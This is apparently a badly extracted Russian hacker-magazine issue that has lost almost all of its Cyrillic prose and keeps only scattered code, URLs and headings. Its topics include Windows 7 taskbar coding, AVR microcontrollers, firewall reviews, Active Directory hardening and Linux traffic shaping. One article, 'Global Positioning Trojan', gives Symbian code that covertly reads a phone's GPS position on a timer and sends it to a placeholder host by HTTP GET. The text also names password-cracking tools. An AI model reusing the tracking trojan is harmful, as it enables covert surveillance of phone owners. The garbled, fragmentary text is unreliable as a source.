self.music = 0
else:
pygame.mixer.music.unpause()
self.music = 1
, , mp3-
. , .
GAME OVER
PyGame . ,
.
! z
HTTP://WWW
links
www.pygame.org
PyGame.
www.penzilla.net/
tutorials/python/pygame
PyGame.
www.python.org
Python.
DVD
dvd

.
093
++++
>> coding
++++
++++

/ ANTONOV.IGOR.KHV@GMAIL.COM /
++++
++++
++++
++++
++++
Out Object
Save
Open Image
file
Show Annotation
Tools
Image
border
My Favorite
Macro
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
SUPERBARCODING
WINDOWS 7

, SuperBar Mac OS.
, .

,

,

. ,
.

Visual Studio -
094
.NET Interop Sample Library (http://code.

msdn.microsoft.com).
Vista-
Vista Bridge ,
Windows 7 (SuperBar,
Librarys, Sensor and Location Platform ..).
SuperBar, ,
,
, ,
.
PROGRESSBAR

SuperBar
ProgressBar. ,
, ,
(, IE8, )
- .

, /
X 07 /127/ 09
>> coding

PROGRESSBAR

. ,
. ,

, .

ProgressBar. , SuperBar
, , .
Visual Studio ,

(DesktopIntegration). .
.

PROGRESSBAR

WindowsFormExtensions. , :
SetTaskbarProgress()
SetTaskbarProgressState()

ProgressBar
,

ComboBox. Text +, -.
THUMBBUTTON
private ThumbButton myThumbButton;
private ThumbButtonManager myThumbButtonManager;
protected override void WndProc(ref Message m)
{
if (m.Msg == Windows7Taskbar.TaskbarButtonCreatedMessage)
{
if (myThumbButtonManager == null)
{
myThumbButtonManager = WindowsFormsExtensions.
CreateThumbButtonManager(this);
}
myThumbButton = myThumbButtonManager.CreateThumbButton(1,
this.Icon, "Test");
myThumbButton.Clicked += delegate
{
MessageBox.Show(Test button);
};
myThumbButtonManager.AddThumbButtons(myThumbButton);
}
if (myThumbButtonManager != null)
{
myThumbButtonManager.DispatchMessage(ref m);
}
base.WndProc(ref m);
}
X 07 /127/ 09
JUMPLIST IE8
,
,
, .
ComboBox
:
Normal
Indeterminate
Error
Pause
NoProgress

.
Clicked ( +)

:
WindowsFormsExtensions.
SetTaskbarProgress(this,
totalProgress);
totalProgress = totalProgress + 10;

,
,
. ,
ProgressBar
SuperBar.
, namespace
Windows7.DesktopIntegration, Windows7.
DesktopIntegration.WindowsForms
totalProgress.
,
ProgressBar.
,
ComboBox.
!
SelectedIndexChanged
(
ProgressBar).
ProgressBar
. ,
( ) case
SetTaskbarProgressState().

Windows7Taskbar.
ThumbnailProgressState,
. 3.
095
++++
>> coding
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++++
++ ++
http://code.msdn.microsoft.com/WindowsAPICodePack Windows API CodePack.

http://www.microsoft.com/downloads
Windows 7 RC SDK. , .
.
http://www.techdays.ru
MS. Windows 7 . ,
, :).
http://habrahabr.ru , IT. Windows 7
. ,
.
http://vr-online.ru
VR-Online , Windows 7.
http://blogs.microsoft.co.il/blogs/sasha MS. C#
Windows 7, . ,
.
http://www.gumpi.com/Blog ,

,
Delphi.

(JUMPLIST)
SuperBar
. (),
,
.. Windows 7 , , JumpList,
- (, IE8).

, ..
. ,
,
JL. , , . ,
JumpListManager. , ,

SuperBar. ?
WndProc. TaskbarButtonCreatedMessage. CreateJumpListManager
WindowsFormExtensions. JumpListManager,
. , .

PROGRESSBAR
int result = comboBox1.SelectedIndex;
switch (result) {
case 0:
WindowsFormsExtensions.SetTaskbarProgressState(
this,
Windows7Taskbar.ThumbnailProgressState.Normal);
break;
case 1:
WindowsFormsExtensions.SetTaskbarProgressState(
this,
Windows7Taskbar.ThumbnailProgressState.
Indeterminate);
break;
}
UserRemovedItems
. ,
,
.. ( ).
AddUserTask
JumpListManager.
ShellLink
:
Path. /.
Title .
Category . JL .
IconLocation .
IconIndex .

.
. ,
, JL , ,
. , JL
.
,
AddUserTask AddToRecent.

Microsoft ,
.
SuperBar OverlayIcons ( ).
. , ,
(, )
++++
++++
++++
++++
DELPHI?
, ,
Visual Studio
. , ,
? ,
, . Daniel Wischnewski
Windows 7 Controls for Delphi. , ,
096
:
1. JumpList.
2. Overlay Icons.
3. ProgressBar Indication.
4. TaskBar Thumbnails.
? , Delphi 7-2009, !
X 07 /127/ 09
>> coding
OVERLAYICONS
THUMBBUTTON

JUMPLIST
THUMBBUTTONS
. , , MSN Messanger.
- .

. ,
.
, .NET
Interop Sample Library, ,
. ,
. :
1. . ImageList.
2. SetTaskbarOverlayIcon.
:
handle .
Icon.
.
3. .
.
Button
Clicked. :
WindowsFormsExtensions.SetTaskbarOverlayIcon
(this,
this.Icon, "My OverlayIcon");
, . .
:
WindowsFormsExtensions.SetTaskbarOverlayIcon(
this,
null,
String.Empty);
.
. . ,
X 07 /127/ 09
protected JumpListManager myJumpListManager;

protected override void WndProc(ref Message m)
{
if (m.Msg == Windows7Taskbar.TaskbarButtonCreatedMessage)
{
myJumpListManager = WindowsFormsExtensions.
CreateJumpListManager(this);
myJumpListManager.UserRemovedItems += (o, e) =>
{
e.CancelCurrentOperation = false;
};
myJumpListManager.AddUserTask(new ShellLink
{
Path = Path.Combine(
Environment.GetFolderPath(
Environment.SpecialFolder.System),
"calc.exe"),
Title = "Calculator",
Category = "Application,
IconLocation = Path.Combine(
Environment.GetFolderPath(
Environment.SpecialFolder.System),
"calc.exe"),
IconIndex = 0
});
myJumpListManager.Refresh();
}
base.WndProc(ref m);
}
TaskBar,
. ,
.
?
( )!
, ,
/ .
,
DVD
dvd
,

.
097
++++
++++
++++
++++
>> coding
? , ,
( ProgressBar), (
) . ,
,
. ; ( ), DVD.
THUMBBUTTONS
/ AZANITO@GMAIL.COM /
++++
( )
Windows Media Player ,
. Media Player Play,
Next, Previous.
. , ,
; Windows. , ,
! ,
, .
, .
vistabridge Windows 7 DesktopIntegration.
,
.
(ThumbButtons) - ThumbButtonManager
ThumbButton. myThumbButton
myThumbButtonManager. WndProc (, )

Windows7Taskbar.TaskbarButtonCreatedMessage.
, ThumbButtonManager. .
myThumbButtonManager
CreateThumbButtonManager() .
CreateThumbButton()
ThumbButtonManager.
:
++++
++++
++++
++++
++++
++++
++++
++++
1. Id . 1.
2. Icon . this.Icon,
, , , .
3. ToolTip .
, ,
Clicked. .
Show MessageBox.
,
Test button.

ThumbButtonManager. AddThumbButtons.
ThumbButton.
, . , : ThumbButtonManager,
. ,
DispatchMessage.
,
.
.
, ,
.
,
SHUTDOWN

Microsoft
, .
. ,
,
, Android

Symbian, iPhone, BlackBerry, Windows

Mobile,

Windows 7

.

.

,
.
,
SDK,

.
, Windows-.

R&D? , ,
. ,
, . .
- Windows 7. ,
. - ,
. .z

Normal
++++
++ ++
Paused
++++
Indeterminate
++++
++++
++++
Error
098
X 07 /127/ 09
++++
>> coding
++++
++++
++++
++++
++++
++++
++++

/ ROOT@DTARASOV.RU /
++++
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
GLOBAL
POSITIONING TROJAN

z

Symbian,
. . , !
?
,

sms , Premium
SMS . ,
.
,

GPS-. ,
(
100
,
). ,

S60
GPS-.

Wi-Fi

- ,
. ,

.
. ,
,
.

,
. ,
( ) SMS,

X 07 /127/ 09
>> coding
,
.
.

?
,

(
sms-), , ,
, ,
,
.
,

. , ,

.
symbian,
-
.
AppUi,
, , ,

. AppUi
MTimeOutNotifier (
Timer.h). , AppUi
, , .
. ,
RPositioner
,
GPS-.
TPositionInfo , , .
TPosition , (,
, , ..)
.
(
) SDK. ,
GetPosition :
Save
Open Image
file
Show Annotation
Tools
Image
border
My Favorite
Macro
,
:
;
;
.
, ,
.
- Symbian z,
. .

.
,

Symbian, , , . ,
, ,
.
GPS
CTimer.
, , CTimer

.

(Observer),
. CGpsTroyTimer
.
, . ,
X 07 /127/ 09
class CGpsTroyAppUi : public

MTimeOutNotifier
{
public: // from MTimeOutNotifier

void TimerExpiredL(); //,

private:
CGpsTroyTimer* iTimer; //,
CGpsTroyAppUi :
iTimer = CUniTelTimer::NewL(
EPriorityStandard, *this);
iTimer->After(KTimeOut);
TimerExpired() :
void CGpsTroyAppUi::TimerExpiredL()
{
GetPosition();
iTimer->After(KTimeOut);
}
GetPosition(),

, ,

.

. RPositionServer,
RPositioner, TPositionInfo TPosition. :
RPositionServer
Location Server. , Location
Server ,

GPS-. RPositionServer
Location Server .
RPositioner
Location Server,
User::LeaveIfError(
iPositionServer.Connect());
User::LeaveIfError(iPositioner.
Open(iPositionServer));
User::LeaveIfError(
iPositioner.SetRequestor(
CRequestor::ERequestorService,
CRequestor::EFormatApplication,
KRequestor));
TPositionUpdateOptions
updateOptions;
updateOptions.SetUpdateInterval(
KUpdateInterval);
updateOptions.SetUpdateTimeOut(
KUpdateTimeout);
User::LeaveIfError(
iPositioner.SetUpdateOptions(
updateOptions));
Cancel();
iPositioner.NotifyPositionUpdate(
iPositionInfo,iStatus);
SetActive();

. ,
, . ,
CGpsTroyAppUi CActive RunL().

.
void CGpsTroyAppUi::RunL()
{
switch(iStatus.Int())
{
case KErrNone:
{
//
TPosition position;
iPositionInfo.GetPosition(
position);
TInt latitude =
position.Latitude();
//
TInt longitude =
position.Longitude();
101
++++
>> coding
++++
++++
++++
++++
++++
X-CREW
:)
//
SendCoordinateL(latitude,longitude);
//
break;
++++
}
default:
// ,
iPositioner.NotifyPositionUpdate(
iPositionInfo,iStatus);
SetActive();
break;
++++
++++
}
}
++++
++++
++++
++++
++++
++ ++
++++
++++
++++
++++
SendCoordinateL(int,int).

? ,
/.
Google Maps API, ,
-, JavaScript Google Maps,
. Google Maps ,
, -.
(,
),
php, post- get-.
-,

http://yourhost.ru/scripts/troy.php?longitude=xxx&latitude=yyy.

, . , Google Maps
Nokia,
, .
, ,
, .
HTTP over TCP.
CHTTPEngine, GET- POST. CTroyTimer, , - ,
CGpsTroyAppUi, MHTTPEngineObserver
, -
102
,
. , CHTTPEngine

http!
CHTTPEngine MHTTPTransactionCallback.
, , CActive. ,
CHTTPEngine , -
: Communication
Server,
comm server .

:
void CGpsTroyAppUi::SendCoordinateL
(Tint latitude,Tint longitude)
{
CHTTPEngine* httpEngine = CHHTPEngine::NewL(this);
TBuf<64> url(_L
("http://host/troysctipt.php?longitude="));
url.AppendNum(latitude);
url.Append(_L("&latitude="));
url.AppendNum(longitude);
httpEngine->GetRequestL(url);
}
, .
,
, . , Symbian,
.
GPS-, , .
,
:
. , ,
, .
, ,
. , ! , , GPS, ;
.
. !z
X 07 /127/ 09

2100 . ( 15%
)
. ,

!
!

+ + DVD:
- 155 ( 25% , )
12
3720
2100
+DVD 6
1200 .
1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
:

;
20
.
,
.
, . ,
, .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru
>> phreaking
CLUSTER / CLUSTERRR@CLUSTERRR.COM /
AVR
,
, , . ,
. -. , .
, ? , AVR.
>> phreaking

AVR, Atmel. WinAVR (,
whenever).
, AVR-GCC,
, . WinAVR,
. :
http://winavr.sourceforge.net,
. ,
. GCC, .
-.
Programmers Notepad.
make. .
, , ...
.
.
- ,
.
Windows *nix
. ,
.
104
, , , . , ,
, , USART ,
. ,
, ,
. . C
.
. , , ,
: DDRx, PORTx PINx.
.
, .
, A, B, C .. , 0
7. .
, ,
. PB0, PC1 ..
. , PA7 , A.
DDRx, PORTx PINx, . , x . ,
B DDRB, PORTB
PINB. 1 . ,
.
X 07 /127/ 09
>> phreaking
AVR
, DDRx . PORTx
, .
PINx
, .
, . ,
:
4
DDRB.
; .
, .
( , ).
.
DDRB , B
. ,
PORTB, ,
B.
, PB2
100 . , ,
, AVR, . ,
; Hello World
. .

#define F_CPU 8000000UL
#include <avr/io.h>
#include <util/delay.h>
int main (void)
{
DDRB |= (1 << 2);
while (1)
{
PORTB |= (1 << 2);
_delay_ms(100);
PORTB &= ~(1 << 2);
_delay_ms(100);
}
return 0;
}
,
.
. .
WinAVR ,
,
. io.h ,
makefile. , .
, ,
, .
delay.h . main
, .
. ,
. ? :)
. DDRB |= (1 << 2) ( !) DDRB .
. ,
<< , 1
<< 2 4, 100.
: DDRB = DDRB | 0b00000100.
: DDRB, X 07 /127/ 09
.
,
, . ,
. ,
. ,
. , .
USART-.

#include <avr/io.h>
#include <avr/interrupt.h>
ISR(USART_RXC_vect)
{
int b;
//
b = UDR;
//
}
- ISR,
. USART_RXC,
, USART-.
, . RXCIE
UCSRB. , USART
:
105
>>
>> pc_zone
phreaking
RTFM!
.

,
.
,

DVD
dvd

,
WinAVR,

.

.
;
, .
!
void USART_init(void)
{
#if F_CPU < 2000000UL && defined(U2X)
UCSRA = _BV(U2X);
UBRRL = (F_CPU / (8UL * UART_BAUD)) 1;
#else
UBRRL = (F_CPU / (16UL * UART_BAUD)) 1;
#endif
UCSRB = (1 << TXEN) | (1 << RXEN);
UCSRB |= (1 << RXCIE);
sei();
}
? ! USART- UART_BAUD ; ,
. ,
.
. UCSRB |= (1 << RXCIE)
, RXCIE
.
, . sei()
, . sei() .
, . cli(). ,
.
(
, cli sei, . dlinyj). ,

USART_init(), ,
. .
.
.
,
.
...
. , .
! .

, defines.h.

//
#define F_CPU 8000000UL
// USART
#define UART_BAUD 9600
// ,
#define HD44780_PORT B
#define HD44780_RS PORT6
#define HD44780_RW PORT4
#define HD44780_E PORT5
#define HD44780_D4 PORT0
, , USART- ,
. -

LCD-,
, COM- .
LCD-
, - !
LCD-, ,
COM- .
ATmega8,
, , .
. 8 USART-. COM-
, ,
, MAX232.
HD44780;
. Winstar WH2404,
24 ,
, , .

106
. , .
. , , :

#include "defines.h"
#include <avr/io.h>
#include <avr/interrupt.h>
#include "hd44780.h"
defines.h ,
, , F_CPU.
io.h
X 07 /127/ 09
>> phreaking
, .
. ,
interrupt.h.
hd44780.h .
HD44780.
;
hd44780.c, . , . ,
, , .
, ,
.
:

volatile char buf[200]; //
volatile int bufsize = 0; //
volatile char ready = 0; // ?
buf , ;
bufsize ( ). ready , ,
.
!
. volatile.

, . , , . ,
, ,
. , ,
, .
! volatile
, . .
-.
X 07 /127/ 09
WINAVR AVR
STUDIO

ISR(USART_RXC_vect)
{
int b;
b = UDR; //
if (((b == 13) || (b == 10))
&& (bufsize > 0)) ready = 1;
if ((b != 13) && (b != 10)
&& (bufsize < sizeof(buf)-1))
buf[bufsize++] = b;
}
. .
, ; ready ,
107
>>
>> pc_zone
phreaking
. , /DEV/
TTS/0 COM-
, .
main,
:
. ,
.
. !

int main(void)
{
LCD_init();
USART_init();
while (1)
{
while (!ready);
//
hd44780_wait_ready();
hd44780_outcmd(HD44780_CLR);
hd44780_outcmd(HD44780_HOME);
hd44780_outcmd(HD44780_DDADDR(0));
int i;
for (i = 0; i < bufsize; i++)
{
hd44780_outdata(buf[i]);
}
bufsize = 0;
ready = 0;
}
return 0;
}
USART,
. while(1);
,
. return 0 ,
; .
, . while
(!ready); .
, ready . ?
, .
volatile,
. ,
ready . , , . ,
108
, (FUSES)?
, .
.
8 , , 0xE4 0xD9. ,
: CKSEL0, CKSEL1, CKSEL3, SUT0, SPIEN,
BOOTSZ0, BOOTSZ1.
, .
. 8 .
. COM- .
, , PCI USB (
).
, .
, ; 9600 ,
, ,
. ? ,
<Enter> . ,
, . , Linux echo Hello world! > /dev/ttyS0
.
,
! ,
. ,
.
. , .
, ,
,
. . , ,
,
LPT-. , LPT- ?
? , ,
.z
X 07 /127/ 09
>> SYN/ACK
GRINDER
/ GRINDER@SYNACK.RU /
>> SYN/ACK
.
, ,
, ,
. ,
, .
USERGATE PROXY & FIREWALL 5.1
: ENTENSYS
WEB: WWW.USERGATE.RU
: PENTIUM 1 ,
512
: WINDOWS 2000/2003/XP
() Entensys
UserGate - . 5. .
,
. NAT,
(HTTP, FTP, POP3, SMTP,
SOCKS). VoIP- (SIP, H323)
IP-.

.

.
DHCP-. DNS-.

, , .
IP-, IP+MAC, IP+MAC+, HTTP Active Directory.
-
110
Authentication Client,
%usergate%\tools. Bandwidth
Manager .
UserGate
( ).
,
,
.
,
70 .
URL ,
. Content-type HTTP-

. UserGate

:
Panda Antivirus ( ).
, ,
.
.
5.x ,
,
, VoIP- (, ).
MS Excel, OpenOffice.
org Calc HTML.
. : , , ,
.
: ,
. .
, (, , ).

UserGate .
,
, ,
NAT ,

.
WAN, LAN. VPN- PPPoE , PPP.

, .
, .
,
. , ,
, ,

, . firewall
.
,
(, WAN-), (, , NAT).
X 07 /127/ 09
>> SYN/ACK
, , , , , .
, , , .
NAT,
, , , SIP/H323 .
,
.
IP- ,
,
.
RUSROUTE 1.3.3
RusRoute (www.rusroute.ru) ,
IP.
,
. . RusRoute
VPN.
( 10000)
RRClient.exe. 32 64
Windows XP/2003/Vista/2008/Seven.
. ,

( 8 ).
: RR-0008- ,
Verify key and generate activation request.
Key is valid,
.
X 07 /127/ 09
: 9/10
: 8/10
: 9/10
: 8/10
NETWORKSHIELD FIREWALL 2006

: NETSIB
WEB: WWW.NETWORKSHIELD.RU
: PENTIUM II 300 , 256
: WINDOWS 2000/XP/2003
NetworkShield Firewall 2006
, NAT. ,
. . ,
(SYN flood, IP spoofing).
Adaptive
Connections Control (Stateful Firewall ).
. , . .
. ,
. ,
, ,
LAN. LAN- , ,
NSF. WAN-, , LAN ( ). , , NSF WAN. ,
,
. NSF UserGate.
NSF. , . , UserGate,
111
>> SYN/ACK
USERGATE
INFO
info
Kerio WinRoute
Firewall
- ,
z 2007 .
UserGate
SIP.
WinProxy
.
DVD
dvd

,
,
UserGate Proxy &
Firewall 5.1.
112
, NSF
.
firewall
, : .
.
,
. .
.
: ,
( ), (, ), ( ), .
.
.
firewall . , IP, . NSF Windows, ,
Active Directory. ( \\nsf\nsclient).

IP-.

( ) (, , ..) ( ).
.

.
: 8/10
: 8/10
: 9/10
: 8/10
NETWORKSHIELD FIREWALL

LAN2NET NAT FIREWALL 1.99
:
WEB: WWW.LAN2NET.RU
: PENTIUM II 300 , 256

: WINDOWS 2000/2003/XP
,
.
: NAT,
, DNS Forwarder.
.
, URL, ,
( ,
?
*). .
X 07 /127/ 09
>> SYN/ACK
LAN2NET
FIREWALL
IP- VIPNET
FIREWALL
RUSROUTE VPN

(, -).
: NTLM, Windows, /,
IP, MAC, IP+MAC, IP, Lan2net Login Client
. .
.
. Lan2net , , , -. -
>> .PRO
SYN/ACK
WINPROXY E-MAIL

.
;
( ). Lan2net
, firewall , . ,
, . (, );
WAN- LAN-, NAT .
LAN,
. LAN-, , .
, firewall . ,
Firewall, .
(, ..)
Firewall,
, ,
. Lan2net , .
.
, ,
firewall.
, .
( ) Lan2net .
: 7/10
: 8/10
: 9/10
: 8/10
VIPNET OFFICE FIREWALL 3.1

:
WEB: WWW.INFOTECS.RU
: PENTIUM III 500 , 512
: WINDOWS 2000/XP/2003/VISTA/2008, LINUX-
114
,
.
NAT. .
.
IP-.
(-). , , .
,
. , , IP-. 4 , .
.
. 2 , . 3
, , .

2 ( 3), 3 (2, 4),
, . , , ,
(,
). (IDS) (WinNuke, Land, Teardrop, Ssping, Tear2,
NewTear, Bonk, Boink, Dest_Unreach, UDP flood, Ping flood, OOBnuke ..)
( ).
ViPNet OF FTP, HTTP SIP.
. , .
,
. - , -, Referrer
Cookie, .

X 07 /127/ 09
>> .PRO
. IP- IP-. , , .
HTML Excel. ,
. . : , , , IP-, ,
, IP-, .
. , .
IP- . , , .
: 6/10
: 8/10
: 5/10
: 6/10
WINPROXY 1.5.3
: LAN-PROJEKT
WEB: WWW.WINPROXY.NET/INDEXRU.HTML
: 80486, 8
: WINDOWS 95/98/ME/NT/2000 (),
WINDOWS XP/2003
, NAT, WinProxy
-.
, WinProxy (
3128). , , . HTTP, HTTPS,
FTP, Telnet, NNTP, SMTP/POP3 ( ), Real Audio,
GOPHER SOCKS. WinProxy
SMTP/POP3, , , POP3-. Mail.
Port Mapping
,
ICQ, IRC . HTTP, FTP
GOPHER .
dial-up (PPPoE,
..) . -.
WinProxy 900 ,
100 . .
, 3129 . ,
.
: 6/10
: 7/10
: 5/10
: 5/10
(, , ),
. UserGate , ,
. ,
SIP- .z
X 07 /127/ 09
>> SYN/ACK

AD
/ GRINDER@SYNACK.RU /
Active Directory:
>> SYN/ACK
Active Directory . , ,
,
. AD , Windows. .
, .
. : ,
,

. ,
.

,
,

, .

,
. ?
.
- Windows,
, .
Windows
95/NT,
116
, ,
(, ). ,
,
( , ),
, ,
.
NT
NTLM (NT LAN Manager;
NTLMv1).
Windows 2k/XP/2k3,

. NTLM
Microsoft LAN Manager,
. ,

LM NT. NT- ,
, MD4- ,
Unicode 256
. LM, 20 ,
.
.
, 7 ,
( 14 ).
,
. ,
2 7 ,
14? , , -
. LM-
,

. , password PASSWORD
LM .
. ,
,
(LM NT).

, ,
. ,
() ,
LM-,
.

NTLM- ,
.
telnet,
. , ,
John the Ripper (www.openwall.com/john),
LCP (www.lcpsoft.com/russian) L0phtCrack
LC5.
; Astake
Symantec ,
LC5 download,
. , LCP ,

,
X 07 /127/ 09
>> SYN/ACK
DNS
LDAP
LDAP
SAM, Sniff
(LC, LCS PwDump).
:
,
brute force.
NTLMv1
NTLMv2.
,
HMAC-MD5,
128- . , ,
NTLMv2 .
NTLMv2 Kerberos
: IP-,
,
(
),
Kerberos
(, firewall).
, .
LM- Windows 2k/
XP/2k3 : NoLMHash
DWORD HKLM\SYSTEM\
CurrentControlSet\Control\Lsa 1
( LM-
KB299656). ,
X 07 /127/ 09
15 ,
LM-
, ,
.
DWORD LMCompatibilityLevel
LM
.
6 :
0 ( ) LM-
NT-, NTLMv2
1
NTLMv2
2 NT-
3 NTLMv2
4
LM-
5
LM- NT-,
NTLMv2

(Group
Policy Object), GPO

Windows
Network security: Do not store LAN Manager
hash value on next password change (

- LAN Manager
). Vista,
. Network Security:
LAN Manager authentication level
NTLM; NTLM2
responses only, LM NTLMv1.
Vista LM- NTLMv1 , LmCompatibilityLevel
3, ,

NTLMv2. NTLM
Network Security:
Restrict NTLM: NTLM authentication for this
domain. Win2k8R2
.
, Deny all,
. ,
NTLM
.
,
AD, ,
.
, ,
, , -
117
>> SYN/ACK
WIN2K8 GPO LM-

LC5 LM/NT-
HTTP://WWW
links
NTLMs
time has passed
blogs.technet.com/
authentication.
John
the Ripper www.
openwall.com/john.
LCP
www.lcpsoft.com/
russian.
-
AD,
PHP: phpadview.web.
envionsoftware.com.
WARNING
info

Windows
95/NT,
,
,
.
118
.
: Windows
:

Active Directory .
(
, ).
, ,
.
, , .
, . , ( ), ,
.
.
,
.
,
- .

.
GPO- :
;
.
,
. :
(-, , ,
..)

.
. , ,
.
.

. DHA- (Directory
Harvest Attack) ,

e-mail
. SMTP- (250 Recipient
OK), .
, DNA. , Exchange Server SMTP
Tarpitting
RCPT TO SMTP-.
.
KERBEROS ,
Kerberos , . ,
Kerberos Win2k UDP- ,
UDP-, 464 (Kerberos). ,
.
Win2k3
Kerberos UDP TCP,
MaxPacketSize 1 (DWORD).
HKLM\System\CurrentControlSet\
Control\Lsa\Kerberos\Parameters.
,
, sidHistory,
,
, (Ticket Granting Ticket, TGT)

12000 . Kerberos
X 07 /127/ 09
>> SYN/ACK
KERBEROS
,
NTLM. ,
Win2k3 ,
support.microsoft.com/kb/327825,
Win2k8.
DOS-,
. ,
.
, , 65535 MaxTokenSize (REG_DWORD),
, KB327825.
sidHistory,
. VBS ,
support.microsoft.com/kb/295758.
Kerberos 5.0,
Kerberos Windows 2k,
(pre-authentication). :
, , , .
KerbCrack
X 07 /127/ 09
GPO
LM/NT-
(Kerberos Password Crack, ntsecurity.nu/toolbox/kerbcrack)

. KerbCrack
Windows NT, Vista,
: .
Kerberos Win2k3
-32, MD4,
MD5 DES. Vista,
AES 128/256.
KerbCrack .
-,

. , ,
. ,
VPN, ,
IPsec. , , Network Security:
Configure encryption types allowed for Kerberos,
Kerberos
DES.
, Win2k8
Allow Cryptography algorithms compatible with Windows NT
4.0. Not Configured,
, ,
,
. Win2k8- , KB942564 (go.microsoft.com/
fwlink/?Linkid=104751), . ,
.
, Win2k8 ,
Account, DES/
AES .
Smart Card Is Required for
Interactive Logon, - .
.
INFO
info

Vista

NTLMv2.
NTLMv2

Win98,

Directory Service
Client.

AD
.
, ,
. , , Windows ,
,
.z
119
>> SYN/ACK
NATHAN BINKERT
ProLiant
/ NAT@SYNACK.RU /
ProLiant DL180 G5:

2U- HP

HP ProLiant DL180 G5
> ( ):
Intel Xeon L5410-L5420 (2,33-2,50 , 1333
FSB, 12 L2, 50 )
Intel Xeon E5405-E5450 (2,00-3,00 , 1333
FSB, 12 M L2, 80 )
Intel Xeon E5205 (1,86 , 1066 FSB, 6
L2, 65 )
> :
Intel 5100
> :
1 PC2-5300 DIMM (DDR2-667), 16 ( 6 DIMM)
>> SYN/ACK
> :
12 LFF SAS 15K rpm 1
300/147/72
12 LFF SATA 7,2K rpm 1
ProLiant HP . ,

1 . HP ProLiant DL180 G5.

, -
. , (2U)
,
12
( 9 ) DL180 G5 ,
.
120
> :
1 PCI-E x8
2 PCI-E x4
750/500/250/160
> RAID:
SATA RAID RAID 0,1
> -:
1 RJ-45 (Ethernet) ( 1 HP
ProLiant Lights Out 100c)
1
2 PS/2
1 VGA
7 USB (2 , 4 1 )
> :
NC105i
PCI-E () WOL PXE
> :
HP PL100G5 LightsOut 100c
> :
750 ( ); 1200
12 / ( , ;
); 750 (, , ;
); 1200
(, ,
) CSCI 2007/2008 ()
> :
DVD-ROM DVD-RW
HP Slim
32 ( 1600x1200x16M)
.
7 4- Intel Xeon 5400 2 Intel Xeon 5200.
1 16 DDR2-667.
: PCI-E x8
PCI-E x4.
, RAID-.

HP Embedded SATA RAID 4 SATA
RAID-
0 1, .
Smart
Array E200 8 SATA/SAS
. P400
Smart Array, 12 SATA/SAS
.

HP PL100G5 Lights-Out 100c,

, , , ,
, KVM .
IPMI 2.0, SMASH-CLP telnet.

:MicrosoftWindowsServer2003R2/2008,
Red Hat Enterprise Linux, SUSE Linux Enterprise
Server, Sun Solaris. : 44190 .
> :
2U (44,80 x 69,88 x 8,75 )
: 13,06
> :
1 ,
X 07 /127/ 09
>> SYN/ACK
NATHAN BINKERT
/ NAT@SYNACK.RU /
-
Depo Sky 220:

Depo Sky 220
> :
VIA C7 Eden 1 , ,
nanoBGA2
> :
512 DDR2-667, 2
> -:
1 VGA
4 - (2 )
2 PS/2
1 LAN (10/100 /)
4 USB (2 )
1 COM
1
> :
VIA UniChrome Pro 64 ( )
> :

, ,
,
Sky 220 Depo Computers.
,
-, ,
4754 .

mini-ITX,
CN700 VIA C7 Eden 1
. 512 DDR2-667 ,

2 .
VIA UniChrome
Pro 64 .
2048x1536 32- , 2D- 3D-
, MPEG-4,
.
-,
8- . VIA Vinyl High Definition
Audio. VIA VT8237A
SATA-
V-RAID (, ,
,
IDE Flash 256 1024 ).
> :
VIA CN700
>> SYN/ACK
> :
65
X 07 /127/ 09
> :
(290x180x68 )
> :
1 2
.
.
,

.
,
Flash-.
,
( 5-15 ).
Sky 220
- . 1 2 ,
(
98 ).
121
>> SYN/ACK

/ J1M@SYNACK.RU /

Linux'
>> SYN/ACK
, ,
.
Linux- Traffic Control, Cisco IOS.
, X,
,
.
100 .
. ?
( ) .

, ,
, ,
. , , ,
.
, .
.
: ! 5+,

, 1 . -
.
, ( ,
)
.

IOS,
Cisco (
,,Dlink,TrendnetNetgear,
).
-
122
Cisco . Linux

Traffic Control, IOS.
TRAFFIC CONTROL Traffic Control , ,

( ,
). ,
.
HTB Traffic Control.
Linux :
Shaping. , .
, .
Scheduling.
. (QoS).
Policing. . .
DDoS.
,
.
TCP/IP
( ).

: , .
,
.
:
(qdisc)
.
(class) ,
.
(filter) .

.(
) ,
FIFO (
, ).

,
.
. .
Linux .
,
, !
pfifo_fast,
FIFO. tc, ,
(),
() .
Traffic Control
,
.
, c ,
()
(), (). .
X 07 /127/ 09
>> SYN/ACK
TRAFFIC CONTROL
PFIFO_FAST
LINUX,

.
(, -1,
..), (, DNS- -1),
. , ,
.
.
: . . u32 fw.

, , :, .
,
iptables/netfilter ( MARK). :
(root qdisc) (ingress qdisc). -
(
pfifo_fast). .
.
. , , , .
, , ( 0). ffff:0
.
TC
tc iproute2.
, , .
ipfw FreeBSD, . :
# tc qdisc add dev eth0 root tbf rate 256kbit \
latency 50ms burst 1540

pfifo FIFO ( , ). .
bfifo pfifo , .
pfifo_fast FIFO . .
tbf Token Bucket Filter (TBF). , . .
sfq Stochastic Fairness Queueing (SFQ). . . .
red Random Early Detection (RED). . . .
prio ( TOS). ,
, .
cbq Class Based Queueing (CBQ). , . .
htb Hierarchical Token Bucket (HTB).
, . .
X 07 /127/ 09
123
>> SYN/ACK
1:0
1:1
1:2
1:0
htb default 15
1:1
htb rate 100mbit

ceil 100 mbit
prio
1:3
172.16.1.0
172.16.2.0
1:11
1:12
1:13
1:14
htb rate
30 mbit
ceil 100mbit
htb rate
20 mbit
htb rate
10 mbit
htb rate
5 mbit
1:15
htb rate
40 mbit
172.16.3.0
10:0
20:0
30:0
sfq
tbf
tbf
10:0
20:0
30:0
40:0
50:0
sfq
sfq
sfq
sfq
sfq
172.16.4.0

256 /. tc:
qdisc add ( del).
dev eth0 , .
root ( ).
tbf .
rate 256kbit latency 50ms burst 1540 , : rate , latency
, burst .
, tbf
eth0 . Token Bucket Filter
(TBF) , .
tc ,
:
tc
mbps = 1024 kbps = 1024 * 1024 bps => /
mbit = 1024 kbit => /
mb = 1024 kb = 1024 * 1024 b =>

, . , , .
, . ,
HTB.
prio . prio ,
FIFO.
, :1. ,
:2 :3. ,
:1 , :3 .
, , prio TOS . prio
() 1:0:
# tc qdisc add dev eth0 root handle 1:0 prio
: prio, ,
(1:1, 1:2 1:3) ,
FIFO. , , sfq 10:0 1:1:
124
